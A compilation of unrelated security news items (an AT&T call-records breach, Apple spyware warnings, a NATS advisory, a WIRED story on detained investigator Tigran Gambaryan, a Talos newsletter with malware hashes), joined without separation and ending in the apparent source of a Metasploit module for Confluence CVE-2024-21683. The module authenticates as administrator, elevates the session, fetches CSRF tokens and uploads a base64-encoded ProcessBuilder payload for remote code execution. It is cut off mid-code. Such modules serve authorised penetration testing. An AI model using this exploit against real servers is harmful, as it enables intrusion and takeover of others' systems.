AT&T has told customers about yet another data breach. This time call and text records of nearly all customers were stolen.

In a déjà-vu nightmare, US phone giant AT&T has notified customers that cybercriminals managed to download phone call and text message records of “nearly all of AT&T cellular customers from May 1, 2022 to October 31, 2022 as well as on January 2, 2023”.

In a filing with the Securities and Exchange Commission (SEC), AT&T said:

> “On April 19, 2024, AT&T Inc. (“AT&T”) learned that a threat actor claimed to have unlawfully accessed and copied AT&T call logs.”

AT&T says the customer data was illegally downloaded from its workspace on a third-party cloud platform. This might be related to the Snowflake incidents we have seen several of by now.

In the statement, AT&T specifies which data it believes was stolen:

> “The call and text records identify the phone numbers with which an AT&T number interacted during this period, including AT&T landline (home phone) customers. It also included counts of those calls or texts and total call durations for specific days or months.”

And which data is unlikely to be included:

> “The downloaded data doesn’t include the content of any calls or texts. It doesn’t have the time stamps for the calls or texts. It also doesn’t have any details such as Social Security numbers, dates of birth, or other personally identifiable information.”

Even though the data doesn’t include customer names, there are many easy ways to find the name that’s associated with a phone number.

This is the second time AT&T has disclosed a security incident this year. Back in March, AT&T confirmed that 73 million people had been affected in a breach that people had been speculating about for some time.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**Summer mega sale**

Go into your vacation knowing you’re much more secure: This summer you can get a huge **50% off a Malwarebytes Standard subscription** or **Malwarebytes Identity bundle**. Run, don’t walk!

 &#8220;Nearly all&#8221; AT&amp;T customers had phone records stolen in new data breach disclosure 

In today's digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability.
Most people don't realize their credentials have been compromised until the damage is done.
Imagine waking up to drained bank accounts, stolen identities, or a company's

Digital Security / Online Safety

In today's digital age, passwords serve as the keys to our most sensitive information, from social media accounts to banking and business systems. This immense power brings with it significant responsibility—and vulnerability.

Most people don't realize their credentials have been compromised until the damage is done.

Imagine waking up to drained bank accounts, stolen identities, or a company's reputation in tatters. This isn't just a hypothetical scenario – it's the harsh reality faced by countless individuals and organizations every day.

Recent data reveals that compromised credentials are the single biggest attack vector in 2024. That means stolen passwords, not exotic malware or zero-day exploits, are the most common way hackers breach systems and wreak havoc.

To help you navigate this critical issue, we invite you to join our exclusive webinar, "Compromised Credentials in 2024: What to Know About the World's #1 Attack Vector."

**What You'll Learn:**

In this webinar, Tim Chase will delve into the world of compromised credentials, covering:

*   **The Anatomy of an Attack**: Understand how attackers steal and exploit credentials through phishing and brute force.
*   **What Happens Next**: Learn about common tactics post-access, such as data exfiltration, ransomware, and lateral movement.
*   **The Price of Inaction**: Discover the financial and reputational damage that can result from credential attacks.
*   **Proactive Defense**: Gain actionable strategies to prevent credential theft with strong passwords, multi-factor authentication, employee training, and threat detection.

**Why You Should Attend:**

*   **Expert Insights**: Tim Chase's extensive experience working with boards and executives on security matters provides a unique perspective on the challenges and solutions surrounding compromised credentials.
*   **Practical Solutions**: Walk away with a clear understanding of the steps you can take to safeguard your credentials and protect your organization from attacks.

Don't miss this opportunity to arm yourself with the knowledge and tools needed to protect your digital kingdom from the ever-present threat of compromised credentials.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ever Wonder How Hackers Really Steal Passwords? Discover Their Tactics in This Webinar

Apple has sent a warning to people targeted by mercenary spyware in 98 countries.

In April 2024, we reported how Apple was warning people of mercenary attacks via its threat notification system. At the time it warned users in 92 countries. In a new round, Apple is now warning users in 98 countries of potential mercenary spyware attacks.

The message sent to the affected users says:

> “Apple detected that you are being targeted by a mercenary spyware attack that is trying to remotely compromise the iPhone associated with your Apple ID.”

In the same message, Apple says that it is very likely that the person in question is being specifically targeted because of what they do or who they are. And, although there is a certain margin of error, the user should take this warning seriously.

Mercenary spyware is used by governments to target people like journalists, political activists, and similar targets, and involves the use of sophisticated tools like Pegasus. Pegasus is one of the world’s most advanced and invasive spyware tools, known to utilize zero-day vulnerabilities against mobile devices.

On the website that explains Apple threat notifications and protection against mercenary spyware, it specifically mentions Pegasus:

> “According to public reporting and research by civil society organizations, technology firms, and journalists, individually targeted attacks of such exceptional cost and complexity have historically been associated with state actors, including private companies developing mercenary spyware on their behalf, such as Pegasus from the NSO Group.”

Apple has sent out similar notifications multiple times a year since 2021 but doesn’t disclose how it determines who to send them to, since that might aid attackers in evading future detection.

Amnesty International urges those that have received such a notification to take it seriously. Amnesty’s Security Lab offers digital forensic support to potential victims like human rights defenders, activists, journalists and members of civil society.

If you are a member of civil society, and you have received an Apple notification, you can contact Amnesty International and request forensic support using the Get Help form.

Whether you’ve received that notification or not, every iPhone user should make sure they have the latest updates, protect the device with a passcode, use multi-factor authentication and a strong password for Apple ID, only install apps from the Apple Play store, use a mobile security product, and be careful what they open or tap on.

People that have reason to believe they might be individually targeted by mercenary spyware attacks, can enable Lockdown Mode on their Apple devices for additional protection.

Lockdown Mode does the following:

*   Blocks most message attachments
*   Blocks incoming FaceTime calls from people you have not called previously
*   Blocks some web technologies and browsing features
*   Excludes location from shared phots and removes Shared Albums
*   Blocks wired connections when the device is locked
*   Blocks auto-joining non-secure WiFi networks
*   Blocks incoming invitations from people you have not previously invited
*   Blocks installation of configuration profiles you may require for work or school

**How to turn on Lockdown Mode on iPhone or iPad**

1.  Open the **Settings** app.
2.  Tap **Privacy & Security**.
3.  Scroll down, tap **Lockdown Mode.**
4.  Tap **Turn On Lockdown Mode**.
5.  Read what it does and tap **Turn On Lockdown Mode** if that is what you want.
6.  Tap **Turn On & Restart**, then enter your device passcode.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

**Summer mega sale**

Go into your vacation knowing you’re much more secure: This summer you can get a huge **50% off a Malwarebytes Standard subscription** or **Malwarebytes Identity bundle**. Run, don’t walk!

 iPhone users in 98 countries warned about spyware by Apple 

NATS.io NATS Server before 2.8.2 and Streaming Server before 0.24.6 could allow a remote attacker to bypass security restrictions, caused by the failure to enforce negative user permissions in one scenario. By using a queue subscription on the wildcard, an attacker could exploit this vulnerability to allow denied subjects.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   Explore
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-29946

**NATS Server and Streaming Server fails to enforce negative user permissions, may allow denied subjects**

Moderate severity GitHub Reviewed Published Jul 11, 2024 to the GitHub Advisory Database • Updated Jul 12, 2024

**Package**

gomod github.com/nats-io/nats-server/v2 (Go)

**Affected versions**

< 2.8.2

gomod github.com/nats-io/nats-streaming-server (Go)

**Description**

Published to the GitHub Advisory Database

Jul 11, 2024

Last updated

Jul 12, 2024

GHSA-2h2x-8hh2-mfq8: NATS Server and Streaming Server fails to enforce negative user permissions, may allow denied subjects

A new resolution echoes what 16 members of Congress have already said to the White House: It must do more to free one of the most storied crypto-focused federal agents in history.

When Tigran Gambaryan was first invited in February to meet with the Nigerian government in order to settle a dispute with his employer, the cryptocurrency exchange Binance, Nigerian officials detained him against his will, stripped him of his passport, and told him he was a “guest” of the state. He's since been charged with financial crimes and jailed for months as a criminal suspect.

Pressure is now mounting within the US Congress for the Biden administration to treat him as what his supporters argue he has been all along: a hostage, held illegally by an unaccountable foreign country.

On Wednesday, US congressman Rich McCormick, who represents Gambaryan's district in his home state of Georgia, submitted a resolution to the House Committee on Foreign Affairs that both urges the Nigerian government to release Gambaryan and calls on the US government to recognize that Gambaryan is being illegally detained as a hostage in an effort to extort his employer, Binance. That resolution represents the latest in a series of growing calls from Congress for the White House to step up its pressure on Nigeria to release Gambaryan, a former federal agent who led many of the most significant cryptocurrency-related criminal cases of the last decade during his time as an IRS criminal investigator.

“The continued detention of Tigran Gambaryan in Nigeria is a clear violation of his rights, and he is simply being used as a means of extortion by the Nigerian government,” McCormick wrote in a statement. “We urge Nigeria to immediately release Tigran and provide him with the necessary medical care and due process. The United States Government must do everything in its power to secure the release of Tigran Gambaryan, and all of our citizens wrongfully detained abroad.”

McCormick's resolution to push for Gambaryan's release follows an earlier open letter from 16 members of Congress calling on the White House to transfer Gambaryan's case to the Office of the Special Presidential Envoy for Hostage affairs. That letter noted that Gambaryan has suffered from malaria and pneumonia, collapsing in court during one day of his trial, yet has been denied proper care in a hospital. “Gambaryan's health and wellbeing are in danger, and we fear for his life,” the letter read. “Immediate action is essential to ensure his safety and preserve his life. We must act swiftly before it is too late.” Two House members, French Hill and Chrissy Houlahan, visited Gambaryan in jail last month and have also called for his release.

Gambaryan and another Binance staffer, Nadeem Anjarwalla, flew to Abuja in late February at the invitation of the Nigerian government after the country's officials accused Binance, where Gambaryan works as head of its investigations and financial crime compliance, of money laundering and contributing to the devaluation of the country's national currency, the naira. But just days into that negotiation, the two men were detained in a government-run “guest house” against their will.

The situation escalated further when Anjarwalla, who is based in Kenya, escaped during a visit to a mosque for Ramadan prayers. Gambaryan was then criminally charged with tax evasion and money laundering—all signs suggest those charges relate to the behavior of Binance, not Gambaryan personally—and moved to Kuje prison, where he has since been held.

Tigran Gambaryan

Photograph: Binance

The charges against Gambaryan are particularly ironic given his track record as a federal agent. Prior to being hired by Binance, which was widely seen as part of the exchange's efforts to clean up its operations' lax compliance and years of alleged money laundering documented in a $4.3 billion settlement with the US government last year, Gambaryan spent a decade leading many of the most significant crypto crime investigations in history. From 2014 to 2017 alone, for instance, Gambaryan identified two corrupt federal agents who had enriched themselves with cryptocurrency from the Silk Road dark-web drug market, helped to track down half a billion dollars worth of bitcoins stolen from early crypto exchange Mt. Gox, helped develop a secret crypto tracing method that located the server hosting the massive AlphaBay dark web crime market, and helped to achieve the takedown of the Welcome to Video crypto-funded child sexual abuse video network.

Gambaryan's supporters point out that his work for the IRS led to the seizure of more than $4 billion dollars, including several of the largest monetary seizures in the history of US criminal justice. “He’s done so much good for this country throughout his career,” Gambaryan's wife Yuki told WIRED in March. “I believe it’s his turn to get the same amount of support from his country.”

When WIRED reached out to Binance about the new resolution seeking Gambaryan's freedom, a company spokesperson responded in a statement: “Tigran is a hero and we are pleased to see that’s recognised by so many people around the world. We are hopeful he’ll be sent home to his family soon.”

Yet the Biden administration has been criticized for reacting slowly and ineffectually to free Gambaryan. In a House Foreign Affairs Committee hearing last month, McCormick laid into Roger Carstens, the White House's special presidential envoy for hostage affairs, and Rena Bitter, the State Department's assistant secretary for consular affairs, asking why Gambaryan's case had not been elevated to that of an urgent hostage situation. “If he was your parent or your son, I would make the case this would already have been elevated. If it was someone of interest to the president or the secretary, this would have already been elevated. He is a US citizen,” McCormick told the hearing. “This guy deserves better.”

Bitter noted in response to McCormick's questioning that her colleagues had visited Gambaryan nine times but remained noncommittal about elevating his case to that of an urgent hostage situation. “We are watching this case closely, and we talk about this case quite frequently,” she told McCormick, adding that the State Department had “asked for humanitarian release” due to Gambaryan's medical issues.

On Thursday, neither the US nor Nigerian Departments of State immediately responded to WIRED's request for further comment on Gambaryan's case.

In his resolution and statements in last month's hearing, McCormick has argued that every aspect of Gambaryan's situation, from the illegality of his detention to Nigeria's record of human rights abuses, qualifies him for treatment as a hostage of a foreign government. One of the two Nigerian government bodies making allegations against Gambaryan dropped all charges against him last month. Yet he remains in Kuje jail, a facility that also houses convicted members of terrorist groups including Boko Haram. Even when he collapsed in court due to symptoms of malaria and pneumonia, the resolution notes, he was only admitted to a hospital for five hours before being returned to jail.

In a statement sent to WIRED Thursday, Gambaryan's wife, Yuki, expressed her concern again for her husband's health, thanked McCormick for his resolution, and emphasized her husband's lack of influence over Binance's actions.

“I hope the US government’s involvement will expedite the process of getting him released. My husband is innocent, he is not a decision maker at Binance and I hope the Nigerian authorities release him,” Gambaryan wrote. “He needs to be freed right now."

Pressure Grows in Congress to Treat Crypto Investigator Tigran Gambaryan, Jailed in Nigeria, as a Hostage

Even if a threat actor isn’t successful in some widespread breach that makes international headlines, even smaller-scale threats and actors are just hoping to cause chaos.

Thursday, July 11, 2024 14:00

With the 2024 Olympics’ Opening Ceremony only two weeks away now, there is one thing that’s an absolute guarantee of one thing happening during the traditionally unpredictable games: Cyber attacks. 

Every time there is a new Olympic Games, there’s a renewed discussion about how threat actors, hacktivists and state-sponsored groups are all gearing up to try to disrupt the games in some way. The Opening Ceremony at the 2018 Olympic Games in South Korea was disrupted by a major cyber attack called Olympic Destroyer, briefly pausing ticket-taking operations and taking down several Olympics-related websites. 

And for this year’s Summer Games, France faces an “unprecedented level of threat,” according to the head of the country’s cybersecurity agency.  

That’s because, in our modern day, there is just simply so much to protect. Ninety-nine percent of modern communication occurs over a network at this point, especially when you’re talking about an international event. That means protecting individual inboxes, mail servers, third-party messaging apps, virtual meetings and more. 

Each attendee of the games is going to bring in their own devices, too, and connect to whatever public network the Olympics stands up at the arenas or fields where competitions are taking place. That’s tens of thousands of new potential entry points for threat actors. 

There are also domains, subdomains, hosts, web applications and third-party cloud resources that the Games rely on, all with their own attack surfaces. 

A study from Outpost24 earlier this year found that the security for all these factors is stronger than when Russia hosted the 2018 FIFA World Cup, which came with a similar set of circumstances and popularity to the Olympics.  

Even if a threat actor isn’t successful in some widespread breach that makes international headlines, even smaller-scale threats and actors are just hoping to cause chaos.  

Last month, a fake AI-generated movie trailer seemed to show famous actor Tom Cruise condemning the International Olympic Committee in a fake documentary for Netflix. That made its rounds on Telegram, along with many threats around terrorist attacks in the hope of scaring attendees away and making the Games seem under-attended. 

Other actors are just looking to spread general misinformation, capitalizing on recent protests and elections in France to, in their mind, sow chaos in an already chaotic time for the country. 

France has been preparing for the bevy of threats with hundreds of penetration tests, tabletop exercises and, of course, partnering with Cisco to protect the Olympic Games.  

**The one big thing **

Based on a comprehensive review of more than a dozen prominent ransomware groups, Talos identified several commonalities in tactics, techniques and procedures (TTPs), along with several notable differences and outliers. Talos’ studies indicate that the most prolific ransomware actors prioritize gaining initial access to targeted networks, with valid accounts being the most common mechanism. Phishing for credentials often precedes these attacks, a trend observed across all incident response engagements, consistent with our 2023 Year in Review report. Over the past year, many groups have increasingly exploited known and zero-day vulnerabilities in public-facing applications, making this a prevalent initial access vector. 

**Why do I care? **

Key findings indicate that many of the most prominent groups in the ransomware space prioritize establishing initial access and evading defenses in their attack chains, highlighting these phases as strategic focal points. Within the past year, many groups have exploited critical vulnerabilities in public-facing applications, becoming a prevalent attack vector, which we addressed later, indicating an increased need for appropriate security controls and patch management. Ransomware actors also continue to apply a significant focus to defense evasion tactics to increase dwell time in victim networks. 

**So now what? **

Our blog post includes several recommendations for how potential targets can protect against the TTPs these groups use. That includes consistently applying patches and updates to all systems and software to address vulnerabilities promptly and reduce the risk of exploitation and implement strong password policies that require complex, unique passwords for each account. Additionally, enforce multi-factor authentication (MFA) to add an extra layer of security. 

**Top security headlines of the week **

**Apple IDs are being targeted in a new SMS-based phishing scam.** Security researchers say that adversaries are sending text messages to iPhone users in the U.S. disguised to look like they’re from Apple but actually intended to steal their Apple login credentials. The phishing messages are made to seem more legitimate with a fake CAPTCHA for users to complete. They are then directed to a malicious web page that looks like an older iCloud login page, where the targeted user is asked to enter their Apple ID. Apple IDs are valuable for attackers because they could allow them to log into the target’s iPhones and iPads, provide access to personal information, and allow the attacker to make unauthorized purchases. Apple warned users that they should be implementing MFA on their devices to ensure an adversary can’t use their credentials on an unknown device, or using Face ID or Touch ID to log into their devices. iPhone users are unlikely to ever receive text messages from Apple asking for their ID, but if they do, they should manually visit the desired website rather than clicking on a link in the message. (CBS News, Forbes) 

**A newly discovered spyware may have been spying on military members across the Middle East for more than five years.** The tool, called GuardZoo, appears to be created by Houthi-aligned actors in Yemen. GuardZoo is a custom Android surveillance tool that’s used to steal potentially valuable information and military intelligence, including documents, photos and data relating to troop locations. Infection of GuardZoo begins with a malicious link sent in a WhatsApp message. These phishing links lead to one of a variety of fake apps outside of the Google Play store, disguising themselves as a range of services including an app for reading the Quran, device location tracking, and other themes relating to the Yemen Armed Forces and Saudi Arabia’s Armed Forces Command and Staff College. GuardZoo managed to fly under the radar for several years because it was a modified version of the previously known Dendroid remote access trojan. Once on a device, GuardZoo immediately disables local logging and exfiltrates all of the victim’s files from the past seven years that are KMZ, WPT, RTE or TRK files, all of which relate to GPS and mapping apps. (Dark Reading, SC Media) 

**The Australian government blamed a Chinese state-sponsored actor for being behind a series of cyber attacks and data breaches dating back to 2022.** The group, known as APT40, is allegedly the perpetrator behind the theft of usernames and passwords from two unnamed Australian networks two years ago. A newly released report from the Australian Cyber Security Centre said APT40 conducts malicious cyber operations for China’s Ministry of State Security, the main agency in China in charge of foreign intelligence. The report says that the actor tries to steal sensitive information by infecting older, and sometimes even inactive, computers that are still connected to sensitive networks. Chinese authorities immediately denied the accusations. Intelligence agencies in Canada, New Zealand, the U.S. and the U.K. co-authored the report. New Zealand’s government previously accused APT40 of targeting its parliamentary services and counsel office in 2021 and stealing sensitive information. (NBC News, Voice of America) 

**Can’t get enough Talos? **

*   Upstream’s 2024 Global Automotive Cybersecurity Report (featuring contributions from Cisco Security)
*   Hidden between the tags: Insights into spammers’ evasion techniques in HTML Smuggling 
*   How do cryptocurrency drainer phishing scams work? 
*   15 vulnerabilities discovered in software development kit for wireless routers 
*   Largest Patch Tuesday in 3 months includes 5 critical vulnerabilities 
*   Cisco Talos details latest tactics employed by prolific ransomware groups 
*   Ransomware Groups Prioritize Defense Evasion for Data Exfiltration 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** 8a366b1d30dd4d03ad8c5c18d0fb978d00d16f5f465bd59db6e09b034775c3ec   
**MD5:** 4fca837855b3bced7559889adb41c4b7   
**Typical Filename:** UIHost32.exe   
**Claimed Product:** McAfee WebAdvisor   
**Detection Name:** Trojan.Miner.ED 

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** 484c74d529eb1551fc2ddfe3c821a7a87113ce927cf22d79241030c2b4a4aa74  
**MD5:** dc30cfd21bbb742c10e3621d5b506780  
**Typical Filename:** KMS-R@1nHook.exe  
**Claimed Product:** N/A  
**Detection Name:** W32.File.MalParent

Checking in on the state of cybersecurity and the Olympics

This Metasploit module exploits an authenticated administrator-level vulnerability in Atlassian Confluence, tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will authenticate, validate user privileges, extract the underlying host OS information, then trigger remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions up to 8.9.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution',        'Description' => %q{          This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,          tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating          tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will          authenticate, validate user privileges, extract the underlying host OS information, then trigger          remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions          up to 8.9.0.        },        'License' => MSF_LICENSE,        'Author' => [          'Ankita Sawlani', # Discovery          'Huong Kieu', # Public Analysis          'W01fh4cker', # PoC Exploit          'remmons-r7'  # MSF Exploit        ],        'References' => [          ['CVE', '2024-21683'],          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],          ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],          ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']        ],        'DisclosureDate' => '2024-05-21',        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'DefaultTarget' => 0,        'Targets' => [ [ 'Default', {} ] ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          # The access log files will contain requests to the exploitable administrator dashboard endpoints.          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default, Confluence serves an HTTP service on TCP port 8090.        Opt::RPORT(8090),        OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']),        OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']),        OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', ''])      ]    )  end  def check    # Begin by retrieving the version string from the login page.    version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version') unless version    # Check the extracted version against all documented vulnerable versions.    if version == Rex::Version.new('8.9.0') ||       version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) ||       version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) ||       version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) ||       version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) ||       version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) ||       version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) ||       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) ||       version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) ||       version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) ||       version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) ||       version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) ||       version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) ||       version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) ||       # According to Atlassian, all versions < 7.17 are vulnerable.       version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))      Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")    else      Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}")    end  end  def login(username, password)    # Perform a POST request to login to Confluence with the provided credentials.    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'dologin.action'),      'keep_cookies' => 'true',      'vars_post' => {        'os_username' => username,        'os_password' => password,        'os_destination' => '%2FXsuccessX'      }    )  end  def elevate    # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place.    vprint_status('Secure Administrator Sessions enabled - elevating session')    # Grab a CSRF token from the elevation page form.    csrf_elevation = get_csrf('doauthenticate.action', 'elevation')    # With the valid elevation token, escalate the current administrator session.    res_elevate = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'),      'keep_cookies' => 'true',      'vars_post' => {        'atl_token' => csrf_elevation,        'password' => datastore['ADMIN_PASS'],        'authenticate' => 'Confirm',        'destination' => '%2FXsuccessX'      }    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate    # Confirm that the response indicates a successful elevation.    fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX')    vprint_status('Administrator session has been elevated')  end  def get_csrf(page, operation)    # Perform a GET request to the target page to grab a CSRF token.    res_get_csrf = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, page)    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf    # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly.    fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token')    # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'.    csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2)    # Token should be 40 characters.    fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40    vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")    csrf_token  end  def get_host_os    # Elevated Confluence administrators can view system information, which will be used to confirm the target OS.    res_sysinfo = send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action')    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo    # Confirm that the response is the expected system info page.    fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system')    # Extract the OS string from the response DOM.    os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text    vprint_status("Target returned the operating system string '#{os}'")    # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.    os.downcase.start_with?('win') ? 'win' : 'nix'  end  def upload_payload(shell)    # Grab a valid macro dashboard CSRF token.    csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro')    # Initialize a multipart form.    payload_form = Rex::MIME::Message.new    # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.    payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"    # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.    payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')    payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")    payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"')    vprint_status("Crafted ProcessBuilder payload string: #{payload_string}")    vprint_status('Sending POST request to trigger code execution')    # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore.    res_upload = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'),      'keep_cookies' => 'true',      'ctype' => "multipart/form-data; boundary=#{payload_form.bound}",      'data' => payload_form.to_s    )    # Connection failure, no response, or malformed response.    print_error('Target did not respond as expected during code execution attempt') unless res_upload    # If the response to the multipart request does not return a 200.    print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200  end  def exploit    # Authenticate to Confluence.    res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login    # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value.    fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX')    vprint_status('Successfully authenticated to Confluence')    # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator.    res_check_admin = 